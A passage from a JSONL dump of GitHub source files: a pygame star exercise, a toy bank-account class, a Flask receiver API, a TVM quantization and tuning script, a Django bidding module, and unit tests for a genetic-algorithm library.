range(number_rows):\n for star_number in range(number_stars_x):\n star = Star(surface)\n star_width, star_height = star.rect.size\n star.x = star_width + 2 * star_width * star_number\n star.rect.x = star.x\n star.rect.y = star.rect.height + 2 * star.rect.height * row_number\n stars.add(star)\n\n\nwhile True:\n #Respond to keypresses and mouse events.\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and\n event.key == pygame.K_q):\n sys.exit()\n\n stars.draw(surface)\n\n pygame.display.flip()\n ","repo_name":"xerifeazeitona/PCC_Alien_Invasion","sub_path":"exercises/13_01_stars/stars.py","file_name":"stars.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38651814296","text":"class BankAccount:\n\n def __init__(self, int_rate, balance): \n self.int_rate = int_rate\n self.balance = balance\n\n\n def deposit(self, amount):\n self.balance += amount\n if amount <= 0:\n raise Exception (\"The deposit has to be above $0.\")\n print(\"You deposit: $\", amount)\n print(f'Your balance is: $ {self.balance}')\n return self\n \n\n def withdraw(self, amount):\n self.balance -= amount\n if self.balance <= 0 :\n raise Exception (f'Insufficient funds: Charging a $5 fee. Now your balance is: $ {self.balance - 5 } Please contact the bank ASAP!')\n print(\"You withdraw: $\", amount)\n print(f'Your balance is: $ {self.balance}')\n return self\n\n\n def display_account_info(self): \n print(f'You balance is: $ {self.balance}')\n print(f'The interest rate is: $ {self.int_rate}')\n return self\n\n\n def yield_interest(self):\n if self.balance > 0:\n self.balance += self.balance * self.int_rate\n print(\"Congratulations! Your interest rate is on the way. Your balance is now: $ \" + str(self.balance))\n else:\n print(\"There is no interest rate at the moment. Please contact the bank for any further information.\")\n return self\n\n \n\nmr_a = BankAccount(0.01, 1000)\nmr_b = BankAccount(0.01, 500)\n\ntry:\n\n mr_a.deposit(500).deposit(200).deposit(100).withdraw(300).display_account_info().yield_interest()\n\n mr_b.deposit(400).deposit(100).withdraw(500).withdraw(400).withdraw(100).withdraw(100).display_account_info().yield_interest()\n\nexcept Exception as a:\n print(a)\n\n","repo_name":"TanapaPalmer/PYTHON","sub_path":"bank_account/bank_account.py","file_name":"bank_account.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"24177446156","text":"import json\nfrom flask import Blueprint, current_app, Response, request\nfrom pprint import pprint\nfrom time import sleep\n\nreceiver_template = Blueprint('receiver_template', __name__, template_folder='templates')\n\n\n@receiver_template.route('/', methods=['GET', 'PUT'])\ndef receiver():\n if request.method == 'GET':\n return show()\n elif request.method == 'PUT':\n return update()\n\n\ndef show():\n current_app.logger.info(\"get receiver \")\n receiverInfo = {\n 'on': current_app.rx.on,\n 'volume': current_app.rx.volume,\n 'input': current_app.rx.input,\n 'mute': current_app.rx.mute,\n 'inputs': current_app.rx.inputs()\n }\n\n return Response(response=json.dumps(receiverInfo), mimetype='application/json')\n\n\ndef update():\n current_app.logger.info(\"update receiver\")\n receiverInfo = request.json\n if 'on' in receiverInfo and current_app.rx.on != receiverInfo['on']:\n current_app.rx.on = receiverInfo['on']\n if current_app.rx.on:\n if 'volume' in receiverInfo and current_app.rx.volume != receiverInfo['volume']:\n current_app.rx.volume = receiverInfo['volume']\n if 'input' in receiverInfo and current_app.rx.input != receiverInfo['input']:\n current_app.rx.input = receiverInfo['input']\n if 'mute' in receiverInfo and current_app.rx.mute != receiverInfo['mute']:\n current_app.rx.mute = receiverInfo['mute']\n return Response(response=json.dumps(receiverInfo), mimetype='application/json')\n","repo_name":"terickson/receiver-api","sub_path":"routes/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"29741684332","text":"from collections import namedtuple\nimport tvm\nfrom tvm import relay, autotvm\nfrom tvm import hago\nimport mxnet as mx\nimport numpy as np\nfrom mxnet import gluon\nimport logging\nimport os\nimport pickle\nimport time\nimport argparse\nimport tvm.relay.testing\nfrom tvm.contrib.debugger import debug_runtime\nfrom tvm.autotvm.tuner import XGBTuner, GATuner, RandomTuner, GridSearchTuner\n\n\nlogging.basicConfig(level=logging.DEBUG)\n\nConfig = namedtuple('Config', ['model', 'expected_acc'])\n# dev = tvm.device(target)\n\n# argparse\nparser = argparse.ArgumentParser(description = 'argparse')\n\nparser.add_argument('--dtype', '-p', required=False, default='fp32', help='fp32 or int8')\nparser.add_argument('--tune', '-t', required=False, default=False, help='tune or not')\nparser.add_argument('--debug', '-d', required=False, default=False, help='use debugger')\n\nargs = parser.parse_args()\n\n#### TUNING OPTION ####\nnetwork = \"resnet-18\"\nlog_file = \"%s-%s.log\" % (network, args.dtype)\ndtype = \"float32\"\n\ntuning_option = {\n \"log_filename\": log_file,\n \"tuner\": \"xgb\",\n \"n_trial\": 2000,\n \"early_stopping\": 600,\n \"measure_option\": autotvm.measure_option(\n builder=autotvm.LocalBuilder(timeout=10),\n runner=autotvm.LocalRunner(number=20, repeat=3, timeout=4, min_repeat_ms=150),\n ),\n}\n\n# You can skip the implementation of this function for this tutorial.\ndef tune_tasks(\n tasks,\n measure_option,\n tuner=\"xgb\",\n n_trial=1000,\n early_stopping=None,\n log_filename=\"tuning.log\",\n use_transfer_learning=True,\n):\n # create tmp log file\n tmp_log_file = log_filename + \".tmp\"\n if os.path.exists(tmp_log_file):\n os.remove(tmp_log_file)\n\n for i, tsk in enumerate(reversed(tasks)):\n prefix = \"[Task %2d/%2d] \" % (i + 1, len(tasks))\n\n # create tuner\n if tuner == \"xgb\" or tuner == \"xgb-rank\":\n tuner_obj = XGBTuner(tsk, loss_type=\"rank\")\n elif tuner == \"ga\":\n tuner_obj = GATuner(tsk, pop_size=100)\n elif tuner == \"random\":\n tuner_obj = RandomTuner(tsk)\n elif tuner == \"gridsearch\":\n tuner_obj = GridSearchTuner(tsk)\n else:\n raise ValueError(\"Invalid tuner: \" + tuner)\n\n if use_transfer_learning:\n if os.path.isfile(tmp_log_file):\n tuner_obj.load_history(autotvm.record.load_from_file(tmp_log_file))\n\n # do tuning\n tsk_trial = min(n_trial, len(tsk.config_space))\n tuner_obj.tune(\n n_trial=tsk_trial,\n early_stopping=early_stopping,\n measure_option=measure_option,\n callbacks=[\n autotvm.callback.progress_bar(tsk_trial, prefix=prefix),\n autotvm.callback.log_to_file(tmp_log_file),\n ],\n )\n\n # pick best records to a cache file\n autotvm.record.pick_best(tmp_log_file, log_filename)\n os.remove(tmp_log_file)\n\n\ndef get_val_data(model_name,\n rec_val,\n batch_size,\n num_workers=4):\n rec_val = os.path.expanduser(rec_val)\n mean_rgb = [123.68, 116.779, 103.939]\n std_rgb = [58.393, 57.12, 57.375]\n \n def batch_fn(batch, ctx):\n data = gluon.utils.split_and_load(batch.data[0], ctx_list=ctx, batch_axis=0)\n label = gluon.utils.split_and_load(batch.label[0], ctx_list=ctx, batch_axis=0)\n return data, label\n\n img_size = 299 if model_name == 'inceptionv3' else 224\n val_data = mx.io.ImageRecordIter(\n path_imgrec = rec_val,\n preprocess_threads = num_workers,\n shuffle = True,\n batch_size = batch_size,\n resize = 256,\n data_shape = (3, img_size, img_size),\n mean_r = mean_rgb[0],\n mean_g = mean_rgb[1],\n mean_b = mean_rgb[2],\n std_r = std_rgb[0],\n std_g = std_rgb[1],\n std_b = std_rgb[2],\n )\n return val_data, batch_fn\n\n\ndef get_model(model_name, batch_size, qconfig, original=False, simulated=False, dataset=None):\n gluon_model = gluon.model_zoo.vision.get_model(model_name, pretrained=True)\n img_size = 299 if model_name == 'inceptionv3' else 224\n data_shape = (batch_size, 3, img_size, img_size)\n mod, params = relay.frontend.from_mxnet(gluon_model, {\"data\": data_shape})\n\n graph = hago.prerequisite_optimize(mod['main'], params=params)\n logging.debug('original')\n logging.debug(graph.astext(show_meta_data=False))\n\n if original:\n return graph, params\n\n with qconfig:\n logging.debug('current quantize config')\n logging.debug(hago.current_qconfig())\n hardware = hago.create_accelerator_description()\n space = hago.generate_search_space(graph, hardware)\n # tuner = hago.BatchedGreedySearchTuner(space, 'accuracy')\n tuner = hago.DefaultSetting(space, 'accuracy')\n # tuner = hago.GreedySearchTuner(space, 'accuracy') \n ctx = tvm.gpu()\n target = 'cuda'\n strategy, result = hago.search_quantize_strategy(graph, hardware, dataset, tuner, ctx, target)\n \n quantizer = hago.create_quantizer(graph, hardware, strategy)\n simulated_graph = quantizer.simulate()\n quantized_graph = quantizer.quantize()\n canonic_graph = relay.qnn.transform.CanonicalizeOps()(tvm.IRModule.from_expr(quantized_graph))\n logging.debug('simulated graph')\n logging.debug(simulated_graph.astext(show_meta_data=False))\n logging.debug('quantize graph')\n logging.debug(quantized_graph.astext(show_meta_data=False))\n # logging.debug('canonicalized graph')\n # logging.debug(canonic_graph.astext(show_meta_data=False))\n # hago.inspect_graph_statistic(graph, hardware, strategy, dataset, ctx, target)\n return quantized_graph, params\n\n\ndef tune_eval(mod, params, tuning_opt, target='cuda', ctx=tvm.gpu(), log_interval=100):\n\n # extract workloads from relay program\n print(\"Extract tasks...\")\n \n # mod, params, input_shape, out_shape = get_network(network, batch_size=1)\n # mod = relay.Function(\n # mod.params, relay.nn.softmax(mod.body), None, mod.type_params, mod.attrs\n # )\n \n mod = tvm.IRModule.from_expr(mod)\n batch_size = 32\n input_shape = (batch_size, 3, 224, 224)\n output_shape = (batch_size, 1000)\n \n if args.tune: \n tasks = autotvm.task.extract_from_program(\n mod[\"main\"], target=target, params=params, ops=(relay.op.get(\"nn.conv2d\"),)\n )\n # run tuning tasks\n print(\"Tuning...\")\n # import pdb; pdb.set_trace()\n tune_tasks(tasks, **tuning_opt)\n\n with autotvm.apply_history_best(log_file):\n print(\"Compile...\")\n \n with relay.build_config(opt_level=3):\n graph, lib, params = relay.build(mod, target)\n \n if not args.debug:\n # create runtime module\n m = tvm.contrib.graph_runtime.create(graph, lib, ctx)\n\n elif args.debug:\n # create debug runtime\n m = debug_runtime.create(graph, lib, ctx, dump_root=\"/tmp/tvmdbg\")\n m.set_input(**params)\n \n ######################################################################\n # Time evaluator\n e = m.module.time_evaluator(\"run\", ctx, repeat=3)\n t = np.array(e().results)*1000\n print(\"time_evaluator: %.3fms (%.5fms)\"%(t.mean(), t.std()))\n ######################################################################\n\ndef get_calibration_dataset(dataset, batch_fn, num_samples=100):\n dataset.reset()\n batches = []\n for i, batch in enumerate(dataset):\n if i * dataset.batch_size > num_samples:\n break\n data, label = batch_fn(batch, [mx.cpu(0)])\n batches.append({'data': tvm.nd.array(data[0].asnumpy()),\n 'label': tvm.nd.array(label[0].asnumpy())})\n return hago.CalibrationDataset(batches)\n\n\ndef test_quantize(cfg, rec_val):\n \n # qconfig = hago.qconfig(skip_conv_layers=[0], log_file='temp.log')\n \n qconfig = hago.qconfig(use_channel_quantize=False, log_file='temp.log')\n batch_size = 32\n val_data, batch_fn = get_val_data(cfg.model, rec_val=rec_val, batch_size=batch_size)\n dataset = get_calibration_dataset(val_data, batch_fn)\n \n orig = True\n \n if(args.dtype == 'int8'):\n orig = False\n \n mod, params = get_model(cfg.model, batch_size, qconfig, dataset=dataset, original=orig)\n tune_eval(mod, params, tuning_option, target='cuda', ctx=tvm.gpu(0))\n\nif __name__ == \"__main__\":\n \n #TODO(for user): replace the line with the path to imagenet validation dataset\n # rec_val = \"~/tensorflow_datasets/downloads/manual/imagenet2012/val_rec.rec\"\n \n rec_val = \"./val.rec\"\n results = []\n configs = [\n Config('resnet18_v1', expected_acc=0.69),\n # Config('resnet50_v1', expected_acc=0.75),\n # Config('inceptionv3', expected_acc=0.76),\n # Config('mobilenet1.0', expected_acc=0.70)\n ]\n \n for config in configs:\n test_quantize(config, rec_val)\n \n","repo_name":"aiha-lab/TVM-HAGO-lab","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12864855679","text":"'''\nCreated on Oct 4, 2015\n\n@author: sumit\n'''\nfrom Djngo.settings import BASE_DIR\nfrom bid.models import *\nfrom datetime import datetime\nfrom itertools import count\nfrom collections import namedtuple\nfrom django.db.models import Max\nfrom bid.business.Registration import UserInformation\nfrom warnings import catch_warnings\nfrom string import upper\nfrom bid.ConstantsInfo import ConstantsInfo\nclass AddItem1(object):\n itcount=count(0) \n def addItem(self,itname,ittype,itdesc,itprice,ituserid,itclosingdate,itclosingtime,itpic,source,destination):\n dict={}\n '''\n self.itcount=self.itcount.next()\n \n #self.itcount=self.itcount.next()\n dict['itemname']=itname\n dict['itemtype']=ittype\n dict['itemdesc']=itdesc\n dict['source']=source\n dict['destination']=destination\n dict['itemimg']=itpic\n #dict['itpics']=itpic\n #fl=open(BASE_DIR+'/static/img/'+str(ituserid)+str(self.itcount)+\".jpg\",'wb+')\n #fl.write(itpic.read())\n #dict['itemimgpath']=str(ituserid)+str(self.itcount)+\".jpg\"\n dict['item_price']=itprice\n '''\n enddate=str(itclosingdate)+\" \"+str(itclosingtime)\n item_info=self.ConfirmValue(itname, ittype, itdesc,itpic, itprice, enddate, ituserid, source, destination,bid_confirm=None)\n dict['item_id']=item_info.id\n dict['item_name']=item_info.item_name\n dict['item_type']=item_info.item_type\n dict['item_info']=item_info.item_info\n dict['imgpath']=item_info.item_img_path\n dict['item_location']=item_info.item_location\n dict['item_destination']=item_info.item_destination\n dict['end_date']=item_info.bid_close_time\n dict['bid_start_price']=item_info.bid_start_price\n return dict\n \n def ConfirmValue(self,itname,ittype,itdesc,imgpath,itprice,enddate,ituserid,source,destination,bid_confirm=None):\n us=User_Info.objects.get(user_name=ituserid)\n dt=str(datetime.now().strftime('%d/%m/%Y %H:%M'))\n iteminfo=Item_Info(item_name=itname,item_type=ittype,item_info=itdesc,item_img_path=imgpath\n ,item_location=upper(source),item_destination=upper(destination),user_id=us,\n bid_start_time=dt,bid_close_time=enddate,bid_start_price=itprice,is_confirm=False)\n iteminfo.save()\n return iteminfo\n \n def ConfirmItem(self,item_id,confirm=None,delete=None):\n item=Item_Info.objects.filter(id=item_id)\n if confirm is not None:\n item.update(is_confirm=True)\n if delete is not None:\n item.delete() \n \n \n \n def item_info(self,userid,start_date=None,end_date=None,itemtype=None,item_location=None):\n item_list=Item_Info.objects.all().filter(user_id=userid).filter(is_confirm=True).order_by('bid_start_time')\n if start_date is not None:\n item_list=item_list.objects.get(bid_start_time=start_date)\n if end_date is not None:\n item_list=item_list.objects.get(bid_close_time=end_date).order_by('bid_close_time')\n if itemtype is not None:\n item_list=item_list.objects.get(item_type=itemtype)\n if item_location is not None:\n item_list=item_list.objects.get(item_location=item_location) \n return item_list\n \n def running_bid(self,userid,location,start_date=None,end_date=None,itemtype=None):\n running_bid_info=[]\n today=str(datetime.now().strftime('%d/%m/%y %H:%M'))\n bid_info=namedtuple('bid_info','id item_name item_type imgpath item_start_price item_max_price source destination bid_start_date bid_end_date')\n item_list=Item_Info.objects.all().filter(item_location=upper(location)).filter(bid_start_time__lte=today).filter(bid_close_time__gte=today).exclude(user_id=userid).order_by('bid_start_time')\n if start_date is not None:\n item_list=item_list.objects.get(bid_start_time__contains=start_date)\n if end_date is not None:\n item_list=item_list.objects.get(bid_close_time__cotains=end_date)\n if itemtype is not None:\n item_list=item_list.objects.get(item_type=itemtype) \n for item in item_list:\n id=item.id\n itnm=item.item_name\n ittype=item.item_type\n bidstartdate=item.bid_start_time\n bidclosedate=item.bid_close_time\n bidstartprice=item.bid_start_price\n imgpath=item.item_img_path\n source=item.item_location\n destination=item.item_destination\n itmax=item.bidding_info_set.values('bid_price').filter(item_id=item.id).aggregate(Max('bid_price')).values()[0]\n maxprice=None\n if itmax is not None:\n maxprice=itmax\n else:\n maxprice='bid not started'\n ip=bid_info(id,itnm,ittype,imgpath,bidstartprice,maxprice,source,destination,bidstartdate,bidclosedate)\n running_bid_info.append(ip)\n return running_bid_info\n\nclass ItemBidInfo:\n def item_info(self,item_id):\n iteminfo=namedtuple('iteminfo','id item_name item_type item_img_path item_desc bid_start_time bid_close_time bid_start_price source destination')\n item=Item_Info.objects.get(id=item_id)\n user_name=UserInformation(item.user_id_id,\"User\").Name\n it=iteminfo(item.id,item.item_name,item.item_type,item.item_img_path,item.item_info,item.bid_start_time,item.bid_close_time,item.bid_start_price,item.item_location,item.item_destination)\n return it\n def item_bid_info(self,item_id,usertype):\n bidinfolist=[] \n bid_info=Bidding_Info.objects.filter(item_id=item_id).order_by('-bid_price')[:10]\n if usertype==\"User\":\n bid_info_tuple=namedtuple('bid_info_tuple','bidder_name mobileno transportname bid_date bid_price')\n for item in bid_info:\n bidder_info=UserInformation(item.bid_person_id_id,ConstantsInfo.transporter)\n bidder_name=bidder_info.Name\n bidder_transportname=bidder_info.transport_name\n bidder_mobileno=bidder_info.Mobileno\n bid_date=item.bidding_date\n bid_price=item.bid_price\n bi=bid_info_tuple(bidder_name,bidder_mobileno,bidder_transportname,bid_date,bid_price)\n bidinfolist.append(bi)\n else:\n bid_info_tuple=namedtuple('bid_info_tuple','bidder_name transportname bid_date bid_price')\n for item in bid_info:\n bidder_info=UserInformation(item.bid_person_id_id,ConstantsInfo.transporter)\n bidder_name=bidder_info.Name\n bidder_transportname=bidder_info.transport_name\n bid_date=item.bidding_date\n bid_price=item.bid_price\n bi=bid_info_tuple(bidder_name,bidder_transportname,bid_date,bid_price)\n bidinfolist.append(bi) \n return bidinfolist\n def bidonitem(self,item_id,user_id,Amount):\n bid_item=Bidding_Info.objects.all().filter(item_id=item_id).filter(bid_person_id=user_id)\n today=str(datetime.now().strftime('%d/%m/%Y %H:%M'))\n if bid_item.count()!=0:\n bid_item.update(bid_price=Amount,bidding_date=today)\n else:\n bid_item=Bidding_Info(item_id=Item_Info.objects.all().get(id=item_id),bid_price=Amount,bidding_date=today,bid_person_id=Transporter_Info.objects.all().get(user_name=user_id))\n bid_item.save()\n \n def bidding_history(self,userid,source=None,destination=None,itemtype=None):\n bidding_history=[]\n item_list=None\n #item_info_tuple=namedtuple('item_info_tupe','item_name')\n today=str(datetime.now().strftime('%d/%m/%Y %H:%M'))\n bid_info=namedtuple('bid_info','id item_name item_type imgpath item_start_price your_price your_bid_date bid_start_date bid_end_date')\n bi=Bidding_Info.objects.all().filter(bid_person_id=userid).filter(is_Exit=False).order_by('-bidding_date')\n if source is not None or destination is not None or itemtype is not None:\n item_list=Item_Info.objects.all() \n if source is not None:\n item_list=item_list.objects.get(item_location=source)\n if destination is not None:\n item_list=item_list.objects.get(item_destination=destination)\n if itemtype is not None:\n item_list=item_list.objects.get(item_type=itemtype) \n \n for bit in bi:\n item=bit.item_id \n item_name=item.item_name\n itemtype=item.item_type\n itemprice=item.bid_start_price\n itimgath=item.item_img_path\n bidstartdate=item.bid_start_time\n bidclose=item.bid_close_time\n yourprice=bit.bid_price\n biddate=bit.bidding_date\n bif=bid_info(bit.item_id_id,item.item_name,itemtype,itimgath,itemprice,yourprice,biddate,bidstartdate,bidclose)\n bidding_history.append(bif)\n return bidding_history\n \n def ExitBid(self,item_id,userid):\n bi=Bidding_Info.objects.filter(item_id=item_id).filter(bid_person_id=userid).update(is_Exit=True)\n\n \n \n \n \n \n \n \n \n \n ","repo_name":"sumitchans/bid1.0","sub_path":"bid/business/ItemInfo.py","file_name":"ItemInfo.py","file_ext":"py","file_size_in_byte":9363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72854762631","text":"import unittest\nfrom unittest import mock\n\nimport numpy as np\n\nfrom sims.agents import genetics\n\nclass TestBinary(unittest.TestCase):\n def setUp(self):\n self.binary = genetics.Binary(6)\n\n def test_from_str(self):\n actual = genetics.Binary('0b110')\n expected = self.binary\n self.assertEqual(actual, expected)\n\n def test_from_str_prefix_zeros(self):\n actual = genetics.Binary('0b0110').literal\n expected = np.array([0, 1, 1, 0], dtype=np.uint8)\n np.testing.assert_array_equal(actual, expected)\n\n def test_from_array(self):\n actual = genetics.Binary(np.array([1, 1, 0]))\n expected = self.binary\n self.assertEqual(actual, expected)\n\n def test__str(self):\n actual = str(self.binary)\n expected = '0b110'\n self.assertEqual(actual, expected)\n\n def test__int(self):\n actual = int(self.binary)\n expected = 6\n self.assertEqual(actual, expected)\n\n def test__len(self):\n actual = len(self.binary)\n expected = 3\n self.assertEqual(actual, expected)\n\n def test__eq_true(self):\n other_binary = genetics.Binary(6)\n actual = other_binary == self.binary\n expected = True\n self.assertEqual(actual, expected)\n\n def test__eq_false_value(self):\n other_binary = genetics.Binary(5)\n actual = other_binary == self.binary\n expected = False\n self.assertEqual(actual, expected)\n\n def test__eq_false_prefix(self):\n other_binary = genetics.Binary('0b0110')\n actual = other_binary == self.binary\n expected = False\n self.assertEqual(actual, expected)\n\n def test__getitem_single_1(self):\n actual = self.binary[1]\n expected = genetics.Binary(1)\n self.assertEqual(actual, expected)\n\n def test__getitem_single_0(self):\n actual = self.binary[2]\n expected = genetics.Binary(0)\n self.assertEqual(actual, expected)\n\n def test__getitem_slice_all(self):\n actual = self.binary[:]\n expected = genetics.Binary(6)\n self.assertEqual(actual, expected)\n\n def test__get_item_slice_partial(self):\n actual = self.binary[1:]\n expected = genetics.Binary(2)\n self.assertEqual(actual, expected)\n\n def test__setitem(self):\n self.binary[:] = 0\n actual = self.binary\n expected = genetics.Binary('0b000')\n self.assertEqual(actual, expected)\n\n def test_array_to_str(self):\n test_array = np.array([1, 1, 0])\n actual = genetics.Binary.array_to_str(test_array)\n expected = '0b110'\n self.assertEqual(actual, expected)\n\n def test_str_to_int(self):\n test_str = '0b110'\n actual = genetics.Binary(test_str)\n expected = genetics.Binary(6)\n self.assertEqual(actual, expected)\n\n def test_validate_literal_not_array(self):\n test_literal = 'hello'\n with self.assertRaises(ValueError):\n genetics.Binary.validate_literal(test_literal)\n\n def test_validate_literal_wrong_dtype(self):\n test_literal = np.array([1, 1, 0], dtype=np.uint16)\n with self.assertRaises(ValueError):\n genetics.Binary.validate_literal(test_literal)\n\n def test_validate_literal_true(self):\n test_literal = np.array([1, 1, 0], dtype=np.uint8)\n genetics.Binary.validate_literal(test_literal)\n\n def test_append_ndarray(self):\n self.binary.append(np.array([1, 0]))\n actual = self.binary\n expected = genetics.Binary(26)\n self.assertEqual(actual, expected)\n\n def test_append_binary(self):\n self.binary.append(genetics.Binary(2))\n actual = self.binary\n expected = genetics.Binary(26)\n self.assertEqual(actual, expected)\n\n def test_flip(self):\n self.binary.flip(2)\n actual = self.binary\n expected = genetics.Binary(7)\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_flip_random_0th_index(self, mock_rand):\n mock_rand.return_value = 0\n self.binary.flip_random()\n actual = self.binary\n expected = genetics.Binary('0b010')\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_flip_random_1st_index(self, mock_rand):\n mock_rand.return_value = .5\n self.binary.flip_random()\n actual = self.binary\n expected = genetics.Binary(4)\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_flip_random_2nd_index(self, mock_rand):\n mock_rand.return_value = 0.999\n self.binary.flip_random()\n actual = self.binary\n expected = genetics.Binary(7)\n self.assertEqual(actual, expected)\n\nclass TestNbit(unittest.TestCase):\n def setUp(self):\n self.nbit_a = genetics.Nbit(genetics.Binary(157), 2)\n self.nbit_b = genetics.Nbit(genetics.Binary(12), 2)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_mutate_0th(self, mock_rand):\n mock_rand.return_value = 0\n self.nbit_a.mutate()\n actual = str(self.nbit_a.literal)\n expected = '0b00011101'\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_mutate_4th(self, mock_rand):\n mock_rand.return_value = 0.125 * 4\n self.nbit_a.mutate()\n actual = str(self.nbit_a.literal)\n expected = '0b10010101'\n self.assertEqual(actual, expected)\n\n @mock.patch('sims.agents.genetics.np.random.rand')\n def test_mutate_last(self, mock_rand):\n mock_rand.return_value = 0.125 * 7\n self.nbit_a.mutate()\n actual = str(self.nbit_a.literal)\n expected = '0b10011100'\n self.assertEqual(actual, expected)\n\n def test_append_nbit(self):\n self.nbit_a.append(self.nbit_b)\n actual = self.nbit_a.literal\n expected = genetics.Binary('0b100111011100')\n self.assertEqual(actual, expected)\n\n def test_append_Binary(self):\n self.nbit_a.append(self.nbit_b.literal)\n actual = self.nbit_a.literal\n expected = genetics.Binary('0b100111011100')\n self.assertEqual(actual, expected)\n\n def test_append_array(self):\n self.nbit_a.append(self.nbit_b.literal.literal)\n actual = self.nbit_a.literal\n expected = genetics.Binary('0b100111011100')\n self.assertEqual(actual, expected)\n\n def test_crossover(self):\n offspring = self.nbit_a.crossover(self.nbit_b, 2)\n actual = str(offspring[0].literal), str(offspring[1].literal)\n expected = ('0b1000', '0b11011101')\n self.assertEqual(actual, expected)\n\nclass TestNodeString(unittest.TestCase):\n def test_even_open_close(self):\n valid_mock_str = '1(1,2(3,4)),()'\n valid_actual = genetics.NodeString.even_open_close(valid_mock_str)\n valid_expected = '(1,2(3,4))'\n self.assertEqual(valid_actual, valid_expected)\n uneven_mock_str = '1(1,2(3,4),()'\n with self.assertRaises(ValueError):\n genetics.NodeString.even_open_close(uneven_mock_str)\n no_open_mock_str = '1'\n with self.assertRaises(ValueError):\n genetics.NodeString.even_open_close(no_open_mock_str)\n\n def test_parse_first_int(self):\n int_first_mock_str = '12312(1,2,3)'\n int_first_actual = genetics.NodeString.parse_first_int(int_first_mock_str)\n int_first_expected = (12312, '(1,2,3)')\n self.assertEqual(int_first_actual, int_first_expected)\n prematter_mock_str = 'ab(12312(1,2,3)'\n prematter_actual = genetics.NodeString.parse_first_int(prematter_mock_str)\n prematter_expected = (12312, '(1,2,3)')\n self.assertEqual(prematter_actual, prematter_expected)\n\n def test_parse_child(self):\n grand_children_mock_child = '123(2,3(3,4),1),43(1,2)'\n grand_children_actual = genetics.NodeString.parse_child(grand_children_mock_child)\n grand_children_expected = '123(2,3(3,4),1)'\n self.assertEqual(grand_children_actual, grand_children_expected)\n child_mock_child = '23,3(2,3)'\n child_actual = genetics.NodeString.parse_child(child_mock_child)\n child_expected = '23'\n self.assertEqual(child_actual, child_expected)\n no_grandchildren_mock_child = '1,23'\n no_grandchildren_actual = genetics.NodeString.parse_child(no_grandchildren_mock_child)\n no_grandchildren_expected = '1'\n self.assertEqual(no_grandchildren_actual, no_grandchildren_expected)\n single_mock_child = '23'\n single_actual = genetics.NodeString.parse_child(single_mock_child)\n single_expected = '23'\n self.assertEqual(single_actual, single_expected)\n\n def test_parse_children(self):\n nested_mock_children_str = '123(2,3(3,4),1),43(1,2),23,4(3,2)'\n nested_actual = genetics.NodeString.parse_children(nested_mock_children_str)\n nested_expected = ['123(2,3(3,4),1)', '43(1,2)', '23', '4(3,2)']\n self.assertListEqual(nested_actual, nested_expected)\n unnested_mock_children_str = '1,23'\n unnested_actual = genetics.NodeString.parse_children(unnested_mock_children_str)\n unnested_expected = ['1', '23']\n self.assertListEqual(unnested_actual, unnested_expected)\n single_mock_children_str = '1'\n single_actual = genetics.NodeString.parse_children(single_mock_children_str)\n single_expected = ['1']\n self.assertListEqual(single_actual, single_expected)\n mock_children_str = '4(5),3(6,7),7'\n actual = genetics.NodeString.parse_children(mock_children_str)\n expected = ['4(5)', '3(6,7)', '7']\n self.assertListEqual(actual, expected)\n\nclass TestNodeFromString(unittest.TestCase):\n def setUp(self):\n self.mock_tree = genetics.Node(\n children=[\n genetics.Node(children=[\n genetics.Node(nodetype=5)\n ], nodetype=4),\n genetics.Node(children=[\n genetics.Node(nodetype=6),\n genetics.Node(nodetype=7)\n ], nodetype=3),\n genetics.Node(nodetype=7)\n ], nodetype=1\n )\n self.mock_tree_string = 'Node: 1(4(5),3(6,7),7)'\n\n def test_str_(self):\n actual = str(self.mock_tree)\n expected = self.mock_tree_string\n self.assertEqual(actual, expected)\n\n def test_from_string(self):\n actual = genetics.Node.from_string(self.mock_tree_string)\n expected = self.mock_tree\n self.assertEqual(str(actual), str(expected))\n\nclass TestNode(unittest.TestCase):\n def test_validate_children(self):\n non_iterable_children = genetics.Node(nodetype=1)\n with self.assertRaises(ValueError):\n genetics.Node(children=non_iterable_children)\n non_node_children = [genetics.Node(nodetype=1), 'a']\n with self.assertRaises(ValueError):\n genetics.Node(children=non_node_children)\n\n def test_depth(self):\n deepest_not_first = genetics.Node.from_string('1(2,3(4,5(2)),4(2(3),4))')\n deepest_not_first_actual = deepest_not_first.depth()\n deepest_not_first_expected = 4\n self.assertEqual(deepest_not_first_actual, deepest_not_first_expected)\n\n def test_pop_child(self):\n pop_index = 1\n mock_node = genetics.Node.from_string('1(2,3(4),2(1,2))')\n returned_actual = mock_node.pop_child(pop_index)\n returned_expected = genetics.Node.from_string('3(4)')\n self.assertEqual(str(returned_actual), str(returned_expected))\n expected_mock_node_after = genetics.Node.from_string('1(2,2(1,2))')\n self.assertEqual(mock_node, expected_mock_node_after)\n\n def test_insert(self):\n insert_index = 1\n child = genetics.Node.from_string('3(4)')\n mock_node = genetics.Node.from_string('1(2,2(1,2))')\n mock_node.insert_child(insert_index, child)\n expected_node_after = genetics.Node.from_string('1(2,3(4),2(1,2))')\n self.assertEqual(mock_node, expected_node_after)\n expected_child_parent = mock_node\n self.assertEqual(child.parent, expected_child_parent) \n\n def test_descendents(self):\n mock_node = genetics.Node.from_string('1(2(3,4),5(6(7),8))')\n actual = [descendent.nodetype for descendent in mock_node.descendents()]\n expected = [1, 2, 3, 4, 5, 6, 7, 8]\n self.assertListEqual(actual, expected)\n\nclass 